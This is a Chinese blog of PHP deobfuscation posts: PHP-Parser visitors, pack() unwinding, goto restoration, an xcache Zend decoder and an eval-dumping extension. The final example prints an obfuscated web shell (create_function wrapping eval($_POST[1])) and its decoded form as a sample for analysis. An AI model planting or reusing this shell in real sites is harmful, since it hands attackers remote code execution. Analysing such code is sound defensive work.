标签: php

  • _kstr2混淆解密

    老规矩,先分析代码。代码的一开始就定义了一个_kstr2的函数,这个函数就是将传入的字符串,转换成明码字符串;从上图中也可以看出,代码中大量调用了这个函数,我们需要找出这些函数调用,并经过_kstr2函数运算后得出的明码替换在原来的位置就好差不多了;我们可以用正则匹配,执行_kstr2函数后,再替换到相应的位置;或者也可以用PHP-Parser遍历ast节点,找出相应节点,并替换成明码字符;正则替换比较容易,写个正则表达式,循环替换就ok,不过可能会有些意外情况,需要多调试几次;用 PHP-Parser 遍历ast节点就相对容易一些,下面给出部分代码:

    class ConstGlobalNodeVisitor extends NodeVisitorAbstract{
        public $constVars,$globalVars;
        public function leaveNode(Node $node){
    	//删除_kstr2函数定义代码
            if ($node instanceof PhpParser\Node\Stmt\If_
                && $node->cond instanceof PhpParser\Node\Expr\BooleanNot
                && $node->cond->expr instanceof PhpParser\Node\Expr\FuncCall
                && $node->cond->expr->name instanceof PhpParser\Node\Name
                && $node->cond->expr->name->parts[0] === 'function_exists'
                && $node->cond->expr->args[0] instanceof PhpParser\Node\Arg
                && $node->cond->expr->args[0]->value instanceof Node\Scalar\String_
                && $node->cond->expr->args[0]->byRef === false
                && $node->cond->expr->args[0]->unpack === false
                && $node->stmts[0] instanceof PhpParser\Node\Stmt\Expression
                && $node->stmts[1] instanceof PhpParser\Node\Stmt\Expression
                && $node->stmts[2] instanceof PhpParser\Node\Stmt\Expression
                && $node->stmts[3] instanceof PhpParser\Node\Stmt\If_
                && $node->stmts[4] instanceof PhpParser\Node\Stmt\Function_
            ) {
    			return NodeTraverser::REMOVE_NODE;
    	}
    	//替换_kstr2函数调用为正常代码
    	if ($node instanceof PhpParser\Node\Expr\FuncCall
    		&& $node->name instanceof PhpParser\Node\Name
    		&& $node->name->parts[0] === "_kstr2"
    		&& $node->args[0] instanceof PhpParser\Node\Arg
    		&& $node->args[0]->value  instanceof PhpParser\Node\Scalar\String_
    		&& $node->args[0]->byRef === false
    		&& $node->args[0]->unpack === false){
    			return new Node\Scalar\String_(_kstr2($node->args[0]->value->value));
    	}
        }
    }
    //其中_kstr2函数来自网络https://www.php.cn/php-ask-432462.html,有兴趣的朋友可以过去查看。

    然后将上述节点遍历类加入Php-Parser的节点遍历中,代码如下:

    $code = file_get_contents($file);
    $parser = (new ParserFactory)->create(ParserFactory::PREFER_PHP7);
    
    try {
        $ast = $parser->parse($code);
    } catch (Error $error) {
        echo "Parse error: {$error->getMessage()}\n";
        return;
    }
    $nodeVisitor = new ConstGlobalNodeVisitor();
    $traverser = new NodeTraverser();
    $traverser->addVisitor($nodeVisitor);
    $ast = $traverser->traverse($ast);
    $prettyPrinter = new Standard;
    $code = $prettyPrinter->prettyPrintFile($ast);
    echo $code;

    经过处理后的代码如下图:

    可以看到还有一些GLOBALS变量和define常量,都可以加到节点遍历中,替换成相应的值,最后发现还有一些变量名混淆,替换成arg,替换后最终得到的解密文件部分截图如下:

    仅记录一下解密过程,最终解密代码就不放出了,以免泛滥。这种加密比较简单,解起来也很顺利,没有什么梗。如果此文侵犯到了您的商业利益,请联系站长删除。

  • PHP免费在线解密

    先上链接: http://decode.zwtt8.com/

    能解一些简单的eval混淆加密,像 V盾、PHPJM、zym等,还有一些不常见的eval,小伙伴们都可以去试一下。

    解密方法整理自网络,调试通过,请使用本工具的小伙伴,不要侵犯别人的商业利益,解密后的代码仅供参考和借鉴,请不要发布授权程序的破解版,作者开发不易,请支持正版。否则一切后果,自行承担。

    如若有侵权情况,请联系站长删除,谢谢合作。

  • PHP代码格式化

    经常用到php代码格式化,原来都是在本地搭建的站点里调用php-parser来格式化,有点不方便,每次还要复制文件到网站目录,然后还要改程序,索性花点时间做个工具,挂在网上,有需要的小伙伴可以看过来了。

    格式化部分利用php-parser来实现的,前台UI使用了layui,挺方便的,代码编辑器本来是想用layui的,但是没有编辑功能,百度找到了一款codemirror的编辑器,确实有点强,最终花了半天时间做出来了。

    附上链接:http://decode.zwtt8.com/format.html

    感兴趣的小伙伴可以去看下。

  • php正则递归匹配

    匹配成对的括号并且嵌套层次未知时,就要用到递归匹配了,以下是匹配php的class类的正则:

    preg_match_all('/class [^\{]*(?<R>\{(?:[^{}]+|(?&R))*\})/',$content,$matches );

    不过还是有意外情况,在类的字符串变量中包含{或}时,就会出错了。

    更多使用方法请参考PHP官方说明文档:

    https://www.php.net/manual/zh/regexp.reference.recursive.php

  • php正则匹配乱码变量名

    先贴上代码:

    preg_match_all('~\$[^0-9/ =\[\]\(\)a-z_\+\$,\';\{\}-]+~is', $content, $vars);

    这里的匹配原理是,不包含数字、字母、下划线和一些边界字符。

    不过这个也不是万能的,要根据实际情况再来修改。

  • 搭建xcache的zend解密程序

    在某论坛上发现zend解密是由xcache的组件完成的,iis中部署了一个php5.4.9的环境,配置好zendloder.dll和php_xcache.dll后,就可以解密了。

    在配置环境的时候遇到一些问题,大部分是php版本和相应组件版本不符造成的。期间想搜索一些相关的搭建经验或者教程,发现百度上根本没有,所以只能自己动手慢慢摸索了。

    百度上有一个免费解zend加密的站,不过只能一个个文件解,不支持批量解密,问了一下批量解密还挺贵,所以决定在此记录一下过程:

    主要记录一下centos系统的编译安装过程,xcache的官方页面有相关说明( http://xcache.lighttpd.net/wiki/BuildingFromSource ),本人也是根据这里的步骤安装。

    zend解密需要安装cacher coverager  disassembler 模块,否则会报错Fatal error: Call to undefined function xcache_dasm_file 编译语句如下:

    ./configure –enable-xcache –enable-xcache-coverager –enable-xcache-disassembler –with-php-config=/www/server/php/54/bin/php-config

    编译成功,也修改了xcache.so的路径,但是phpinfo()显示根本没有相应模块,很是纳闷儿。

    最后把php卸载重新安装,xcache重新编译,就好了,有可能phpinfo已经被xcache给缓存了,造成上述问题。

  • PHP混淆解密之pack还原大法

    先看一段代码:

    图中代码已经格式化,可以看到有大量pack,当然,不只截图中的这些,手动替换的话,肯定要换到手软。当然了,肯定有自动替换的方法,mine就想到了一个比较笨的办法,下边详细说下。

    分析下代码,上边是pack参数的数组,存在Globals变量中,这些数组就不管了,我们直接把有pack的代码行,变成一个字符串,然后把pack部分分离出来,接到代码中,例如:

    echo'$GLOBALS["'.pack("H*", $GLOBALS[AAAAA____][0x5]).'"] = "'.pack("H*", $GLOBALS[AAAAA____][06]).'";';

    这样就会把这一行代码直接打印出来,打印出来后pack就被替换成真正的字符了,当然必须得自动化处理,代码如下:

    <?php
    $txt = file('1.php');//按行读取目标文件1.php
    foreach($txt as $t){
    	$t = str_replace("'", "\'", $t);//转义
    	$t = toPack($t);
    	echo 'echo \''.$t.'\';';
    }
    
    function toPack($t){
    	preg_match_all('/pack\([^\)]*?\)/s', $t, $pack);
    	if($pack){
    		foreach($pack[0] as $p){
    			$t = str_replace($p, '"\'.'.$p.'.\'"', $t);
    		}
    	}
    	return $t;
    }
    ?>

    经过处理后,输出的代码要替换原来的文件内容,运行一遍,才会得到去除pack的代码。

    当然了,利用这种方法还能还原一些全局变量或者其他的加密标签,你可以改造得更智能,更自动化,本文仅分享一下思路,希望对你有所启发。

  • PhpParser还可以用来解密

    接了一个解密的单子,看了下程序代码,有大量的goto语句。刚开始以为可以用正则匹配并还原代码位置,就解决问题了,到了真正处理的时候,发现这样根本行不通。网上查了很多,都没有现成的解密工具。

    这种其实也不算是加密,只是打乱了代码的顺序,理论上是可以手动还原的,但实际上,手动的话,会让你感到怀疑人生,因为代码量太大了。

    发现有人用PhpParser来解密,这个工具本来是用来格式化php代码的。

    以下内容来自网络:

    单纯的if语句:这种单一存在的语句在混淆器中处理后,其中的condition会被反向 也就是条件反向的处理,所以处理if语句前需要遍历一次语法树进行condition的反向还原,即de_cond
    
    复杂的if语句:比如if..else..和if..elseif..else等,这种if语句的处理只需正常处理即可
    
    嵌套if语句:编程过程中,语句的嵌套是不可少的,而在混淆器处理过的代码中是没有嵌套可言的,一切都是在外层存在的,在处理if过程中,加入一个节点嗅探,如果嗅探到所嵌套的节点有if语法,则让本次混淆节点再走一遍综合if解析 ([funcion parse_if_stmt])
    
    正常stmt混淆:比如echo "hello world";会被混淆成label xxxx: echo "hello world"; goto next_label;,也就是三个语法块为一条语句,然后使用这三个语法点构成一个混淆节点,类似$tunk[] = array($label,$stmt,$goto),其他语句相同
    
    这里还原难度最大的还是if语句的还原,以为还涉及嵌套的if。下面是if语句的语句处理点:
    
    解析elseif语法:如果当前节点的下一个节点为if语法块,则进行elseif的还原
    
    解析else语法:如果遇到的混淆中间节点为goto的,则认定为else语句结束点并进行结束处理。
    
    检测是否为跳点:由于混淆器内部会有多余的label进行干扰,需要构建一个跳点检测器进行跳点处理,处理foreach等loop语句的干扰节点,遇到这些节点后将跳过一个混淆节点。
    
    建立节点监听器:最后需要有一个语法树的traverse,你可以建立一个自己的节点监听器,监听过来的语法,然后处理如function、ClassMethod、TryCatch等节点的混淆语法树。
    
    最后说说我写解密脚本过程遇到的问题吧。
    
    对于上面提到的正常的stmt混淆的还原还是比较简单的,写脚本的第一天就完成了这一步。
    
    最让人头疼的还是处理if语句,外层的还原还是很简单的,但是遇到嵌套的处理时就非常头大了,我一共用了3天写这个脚本,其中两天都是在处理if语句。
  • 解密加密的PHP程序

    PHP代码混淆

    PHP代码混淆一般来说有两种方法:

    • 需要PHP扩展
    • 无需PHP扩展

    本文我们主要讲解无需PHP扩展的代码混淆的解密。大多数的无需扩展的php代码混淆原理上都是使用eval进行代码的执行。如果我们能够得到eval函数的参数,即可获得解密后的代码。

    不过,一般来说PHP的混淆都会通过多次eval来还原并执行php代码,所以我们可以通过hook PHP的eval函数来打印其参数来解密代码。

    hook eval

    PHP中的eval函数在Zend里需要调用zend_compile_string函数,我们可以通过调试看看zend_compile_string函数。

    user@ubuntu ~/php-5.6.35/Zend ~ grep -rn “zend_compile_string” *
    zend.c:693: zend_compile_string = compile_string;

    我们发现zend_compile_string函数其实就是compile_string函数。所以我们可以通过写一个简单的PHP代码,看能否在compile_string中获取到eval参数的值

    <?php
    eval(“phpinfo();”);
    ?>

    首先我们编译一下下载好的PHP。注意,由于我们后面要进行调试,所以要在编译时加上-g参数,加调试符号。

    ./configure CFLAGS=“-g” CXXFLAGS=“-g”
    make -j16

    接着我们使用gdb调试php程序。首先设置程序的参数,且在compile_string函数下好断点。

    gdb-peda$ set args xxx.php
    gdb-peda$ b compile_string
    Breakpoint 1 at 0x6b4480: file Zend/zend_language_scanner.l, line 716.

    然后让php程序跑起来

    发现程序断下来后,我们发现compile_string的第一个参数source_string为php代码中eval函数的参数在Zend中的结构——即zval_structsource_string.value.str.val即为参数的字符串形式。

    • 通过修改compile_string函数来打印eval的参数,代码如下
    if (Z_TYPE_P(source_string) == IS_STRING) // 判断是否为string类型
    {
    len = Z_STRLEN_P(source_string); // 求string的长度
    str = estrndup(Z_STRVAL_P(source_string), len); // 拷贝到str中
    printf(“\n==================DUMP_CODE====================\n”);
    printf(“%s\n”, str); //打印
    printf(“\n==================DUMP_CODE====================\n”);
    }

    修改好之后重新编译php,运行被加密的php代码

    解密后的PHP代码如下

    可以看到已经完全还原了被混淆的PHP代码

    • 通过编写php扩展来解密php脚本

    编写php扩展的原理就是用我们的函数hook zend_compile_string函数,将函数的参数打印出来后再交还给zend_compile_string函数执行即可。

    ./ext/ext_skel –extname=decrypt_code

    首先,我们写一个自己的hook函数。此函数的功能就是判断eval函数的参数是否为字符串,如果不是,则按原路径执行;如果是,则将参数打印出来后按照原路径执行。

    static zend_op_array *decrypt_code_compile_string(zval *source_string, char *filename TSRMLS_DC)
    {
    int len;
    char *str;
    if (Z_TYPE_P(source_string) != IS_STRING)
    {
    return orig_zend_compile_string(source_string, filename TSRMLS_CC);
    }
    len = Z_STRLEN_P(source_string);
    str = estrndup(Z_STRVAL_P(source_string), len);
    printf(“\n==========DUMP===========\n”);
    printf(“%s”, str);
    printf(“\n==========DUMP===========\n”);
    return orig_zend_compile_string(source_string, filename TSRMLS_CC);
    }

    接着,我们修改PHP扩展加载函数

    PHP_MINIT_FUNCTION(decrypt_code)
    {
    /* If you have INI entries, uncomment these lines
    REGISTER_INI_ENTRIES();
    */
    orig_compile_string = zend_compile_string;
    zend_compile_string = decrypt_code_compile_string;
    return SUCCESS;
    }

    此函数的功能就是保存zend_compile_string函数的地址,接着用我们的hook函数替换zend_compile_string的地址。当eval函数调用zend_compile_string时,就调用了我们的hook函数。

    最后,我们修改PHP扩展的卸载函数

    PHP_MSHUTDOWN_FUNCTION(decrypt_code)
    {
    /* uncomment this line if you have INI entries
    UNREGISTER_INI_ENTRIES();
    */
    zend_compile_string = orig_zend_compile_string;
    return SUCCESS;
    }

    当这个扩展被卸载的时候将函数的hook解除。

    最后,编译我们的扩展

    phpize
    ./configure –with-php-config=/usr/local/php/bin/php-config
    make

    接着,在php.ini中加上我们的扩展。

    extension=decrypt_code.so

    运行此脚本也可得到同样的输出。

    0x04 利用其他函数还原的解密

    其实,混淆代码的解密就是类似于代码执行。最终还是要执行PHP代码,而执行PHP代码的方法很多,除了eval函数还有assertcall_user_funccall_user_func_arraycreate_function等。这些函数的底层也是调用了zend_compile_string,所以也可以利用hook eval来还原混淆后的加密代码。

    0x05 Example

    一段示例代码。

    <?php
    $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF(“”,$_cC);@$_();
    ?>

    运行一下,得到解密后的结果。

    ./php 3.php
     
    =====================DUMP_CODE========================
    function __lambda_func(){eval($_POST[1]);}
     
    =====================DUMP_CODE========================